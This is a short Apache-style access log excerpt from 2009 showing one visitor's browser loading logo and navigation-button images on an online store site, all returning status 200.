123.16.245.65 - - [28/Jul/2009:04:01:45 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
123.16.245.65 - - [28/Jul/2009:04:01:47 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
123.16.245.65 - - [28/Jul/2009:04:01:47 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
123.16.245.65 - - [28/Jul/2009:04:01:47 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
123.16.245.65 - - [28/Jul/2009:04:01:47 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
123.16.245.65 - - [28/Jul/2009:04:01:47 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
123.16.245.65 - - [28/Jul/2009:04:01:47 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
